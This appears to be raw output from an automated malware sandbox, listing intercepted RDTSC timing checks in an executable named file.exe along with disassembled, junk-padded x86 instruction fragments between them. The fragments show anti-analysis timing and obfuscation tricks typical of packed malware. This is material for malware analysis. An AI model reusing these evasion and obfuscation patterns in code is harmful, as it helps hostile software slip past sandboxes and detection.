Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D50 second address: 4CA0D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA0D56 second address: 4CA0D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA08B0 second address: 4CA08C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA08C0 second address: 4CA0903 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4FB8D6227Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F4FB8D62280h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F4FB8D62287h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0DC6 second address: 4CE0DCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0DCC second address: 4CE0DD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0DD2 second address: 4CE0DD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0DD6 second address: 4CE0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4FB8D6227Bh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0DEC second address: 4CE0DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0467 second address: 4CC046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC046B second address: 4CC0471 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0471 second address: 4CC0482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FB8D6227Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0482 second address: 4CC04AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F4FB8FDD4FEh 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4FB8FDD4FDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04AA second address: 4CC04BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04BF second address: 4CC04E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov di, cx 0x0000000e mov dh, ch 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov si, 8073h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04E7 second address: 4CC04EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC04EC second address: 4CC0533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F4FB8FDD506h 0x00000011 and dword ptr [eax], 00000000h 0x00000014 jmp 00007F4FB8FDD500h 0x00000019 and dword ptr [eax+04h], 00000000h 0x0000001d pushad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CA073A second address: 4CA0748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D6227Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0008 second address: 4CC0038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD508h 0x00000009 and ecx, 78A549D8h 0x0000000f jmp 00007F4FB8FDD4FBh 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0038 second address: 4CC0066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 pushad 0x00000009 mov dx, ax 0x0000000c jmp 00007F4FB8D6227Eh 0x00000011 popad 0x00000012 push eax 0x00000013 jmp 00007F4FB8D6227Bh 0x00000018 xchg eax, ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0066 second address: 4CC006A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC006A second address: 4CC006E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC006E second address: 4CC0074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0074 second address: 4CC0091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62289h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC0091 second address: 4CC0095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02D0 second address: 4CC02F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FB8D62287h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CC02F8 second address: 4CC035C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4FB8FDD4FFh 0x00000009 adc ax, ECAEh 0x0000000e jmp 00007F4FB8FDD509h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 jmp 00007F4FB8FDD4FCh 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F4FB8FDD500h 0x00000023 mov ebp, esp 0x00000025 pushad 0x00000026 mov edi, esi 0x00000028 call 00007F4FB8FDD4FAh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0626 second address: 4CE0678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62282h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ah, 6Eh 0x0000000b popad 0x0000000c push eax 0x0000000d jmp 00007F4FB8D6227Ch 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F4FB8D62280h 0x00000018 mov ebp, esp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4FB8D62287h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0678 second address: 4CE0694 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 3Bh 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 jmp 00007F4FB8FDD4FAh 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0694 second address: 4CE06B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE06B1 second address: 4CE0717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov si, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [76FB65FCh] 0x00000010 jmp 00007F4FB8FDD505h 0x00000015 test eax, eax 0x00000017 jmp 00007F4FB8FDD4FEh 0x0000001c je 00007F502B230776h 0x00000022 jmp 00007F4FB8FDD500h 0x00000027 mov ecx, eax 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F4FB8FDD507h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0717 second address: 4CE0755 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007F4FB8D62287h 0x00000011 and ecx, 1Fh 0x00000014 pushad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0755 second address: 4CE0798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F4FB8FDD4FEh 0x0000000a popad 0x0000000b ror eax, cl 0x0000000d jmp 00007F4FB8FDD500h 0x00000012 leave 0x00000013 jmp 00007F4FB8FDD500h 0x00000018 retn 0004h 0x0000001b nop 0x0000001c mov esi, eax 0x0000001e lea eax, dword ptr [ebp-08h] 0x00000021 xor esi, dword ptr [00D22014h] 0x00000027 push eax 0x00000028 push eax 0x00000029 push eax 0x0000002a lea eax, dword ptr [ebp-10h] 0x0000002d push eax 0x0000002e call 00007F4FBCFDDBC5h 0x00000033 push FFFFFFFEh 0x00000035 pushad 0x00000036 pushad 0x00000037 mov bx, ax 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE0798 second address: 4CE07E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 jmp 00007F4FB8D6227Bh 0x0000000c ret 0x0000000d nop 0x0000000e push eax 0x0000000f call 00007F4FBCD6295Ah 0x00000014 mov edi, edi 0x00000016 jmp 00007F4FB8D62286h 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F4FB8D62280h 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4FB8D6227Dh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE07E6 second address: 4CE07FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4CE07FB second address: 4CE0801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90010 second address: 4C90016 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90016 second address: 4C900B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d mov ax, A637h 0x00000011 mov ecx, 5E7E6ED3h 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a jmp 00007F4FB8D62286h 0x0000001f mov ebp, esp 0x00000021 jmp 00007F4FB8D62280h 0x00000026 and esp, FFFFFFF8h 0x00000029 jmp 00007F4FB8D62280h 0x0000002e xchg eax, ecx 0x0000002f jmp 00007F4FB8D62280h 0x00000034 push eax 0x00000035 pushad 0x00000036 mov bh, F2h 0x00000038 mov ch, 04h 0x0000003a popad 0x0000003b xchg eax, ecx 0x0000003c jmp 00007F4FB8D62285h 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 jmp 00007F4FB8D62288h 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C900B6 second address: 4C900BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C900BA second address: 4C900C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C900C0 second address: 4C900D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8FDD4FDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C900D1 second address: 4C900E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C900E0 second address: 4C900E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C900E6 second address: 4C90101 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FB8D62287h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90101 second address: 4C90105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90105 second address: 4C901BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4FB8D6227Bh 0x00000010 jmp 00007F4FB8D62283h 0x00000015 popfd 0x00000016 pushfd 0x00000017 jmp 00007F4FB8D62288h 0x0000001c sbb ecx, 273066F8h 0x00000022 jmp 00007F4FB8D6227Bh 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebx, dword ptr [ebp+10h] 0x0000002c pushad 0x0000002d pushad 0x0000002e call 00007F4FB8D62282h 0x00000033 pop ecx 0x00000034 pushfd 0x00000035 jmp 00007F4FB8D6227Bh 0x0000003a or cx, 3F6Eh 0x0000003f jmp 00007F4FB8D62289h 0x00000044 popfd 0x00000045 popad 0x00000046 mov ch, 50h 0x00000048 popad 0x00000049 push ebp 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d mov ebx, 38FB92E8h 0x00000052 call 00007F4FB8D62281h 0x00000057 pop ecx 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901BE second address: 4C901DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4FB8FDD500h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901DC second address: 4C901E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901E2 second address: 4C901E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C901E6 second address: 4C90244 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D6227Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [ebp+08h] 0x0000000e jmp 00007F4FB8D6227Eh 0x00000013 xchg eax, edi 0x00000014 jmp 00007F4FB8D62280h 0x00000019 push eax 0x0000001a jmp 00007F4FB8D6227Bh 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 mov cl, 2Dh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F4FB8D62287h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90244 second address: 4C90280 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov si, 38F3h 0x00000011 pushfd 0x00000012 jmp 00007F4FB8FDD508h 0x00000017 sbb ax, 79F8h 0x0000001c jmp 00007F4FB8FDD4FBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90280 second address: 4C90286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90286 second address: 4C9028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9028A second address: 4C902FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F502B0005F9h 0x0000000e pushad 0x0000000f mov edx, 6B4A1D40h 0x00000014 pushfd 0x00000015 jmp 00007F4FB8D62289h 0x0000001a adc si, D946h 0x0000001f jmp 00007F4FB8D62281h 0x00000024 popfd 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d jmp 00007F4FB8D6227Eh 0x00000032 je 00007F502B0005BCh 0x00000038 pushad 0x00000039 mov bl, al 0x0000003b mov edx, 41FB307Eh 0x00000040 popad 0x00000041 mov edx, dword ptr [esi+44h] 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 movzx esi, di 0x0000004a popad 0x0000004b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C902FE second address: 4C90368 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a or edx, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F4FB8FDD4FAh 0x00000012 test edx, 61000000h 0x00000018 jmp 00007F4FB8FDD500h 0x0000001d jne 00007F502B27B853h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F4FB8FDD4FEh 0x0000002a jmp 00007F4FB8FDD505h 0x0000002f popfd 0x00000030 mov ch, DEh 0x00000032 popad 0x00000033 test byte ptr [esi+48h], 00000001h 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov di, cx 0x0000003d movzx eax, dx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90368 second address: 4C9036E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C9036E second address: 4C90397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F502B27B80Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 mov dl, 6Ch 0x00000016 movzx esi, dx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C90397 second address: 4C903DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8D62280h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, si 0x00000012 pushfd 0x00000013 jmp 00007F4FB8D62286h 0x00000018 adc eax, 1DCDE758h 0x0000001e jmp 00007F4FB8D6227Bh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C903DE second address: 4C903E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C808B7 second address: 4C80980 instructions: 0x00000000 rdtsc 0x00000002 mov cx, F2D3h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007F4FB8D62281h 0x00000014 sbb ah, FFFFFF96h 0x00000017 jmp 00007F4FB8D62281h 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F4FB8D62281h 0x00000024 xchg eax, ebp 0x00000025 jmp 00007F4FB8D6227Eh 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F4FB8D6227Eh 0x00000033 add esi, 4FA0A718h 0x00000039 jmp 00007F4FB8D6227Bh 0x0000003e popfd 0x0000003f mov ch, 7Eh 0x00000041 popad 0x00000042 and esp, FFFFFFF8h 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007F4FB8D62281h 0x0000004c add esi, 45CEF0B6h 0x00000052 jmp 00007F4FB8D62281h 0x00000057 popfd 0x00000058 popad 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F4FB8D62289h 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80980 second address: 4C809E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD501h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d mov eax, 1C6CDA13h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ebx 0x00000016 popad 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F4FB8FDD4FAh 0x00000022 adc al, FFFFFF98h 0x00000025 jmp 00007F4FB8FDD4FBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov cx, 664Fh 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F4FB8FDD507h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C809E4 second address: 4C809EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C809EA second address: 4C809F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C809F0 second address: 4C80B25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4FB8D62288h 0x00000010 add ecx, 109BE488h 0x00000016 jmp 00007F4FB8D6227Bh 0x0000001b popfd 0x0000001c mov bx, cx 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 pushad 0x00000024 jmp 00007F4FB8D62280h 0x00000029 jmp 00007F4FB8D62282h 0x0000002e popad 0x0000002f sub ebx, ebx 0x00000031 jmp 00007F4FB8D62281h 0x00000036 test esi, esi 0x00000038 jmp 00007F4FB8D6227Eh 0x0000003d je 00007F502B007B91h 0x00000043 pushad 0x00000044 pushfd 0x00000045 jmp 00007F4FB8D6227Eh 0x0000004a jmp 00007F4FB8D62285h 0x0000004f popfd 0x00000050 pushfd 0x00000051 jmp 00007F4FB8D62280h 0x00000056 or ch, 00000008h 0x00000059 jmp 00007F4FB8D6227Bh 0x0000005e popfd 0x0000005f popad 0x00000060 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000067 jmp 00007F4FB8D62286h 0x0000006c mov ecx, esi 0x0000006e jmp 00007F4FB8D62280h 0x00000073 je 00007F502B007B2Ah 0x00000079 jmp 00007F4FB8D62280h 0x0000007e test byte ptr [76FB6968h], 00000002h 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F4FB8D62287h 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80B25 second address: 4C80B2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80B2B second address: 4C80B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80B2F second address: 4C80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FB8FDD4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F502B282D6Ch 0x00000011 pushad 0x00000012 mov esi, 413BB93Bh 0x00000017 call 00007F4FB8FDD500h 0x0000001c mov si, 4521h 0x00000020 pop esi 0x00000021 popad 0x00000022 mov edx, dword ptr [ebp+0Ch] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F4FB8FDD506h 0x0000002e add esi, 6CC019E8h 0x00000034 jmp 00007F4FB8FDD4FBh 0x00000039 popfd 0x0000003a pushad 0x0000003b popad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4C80B94 second address: 4C80B9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
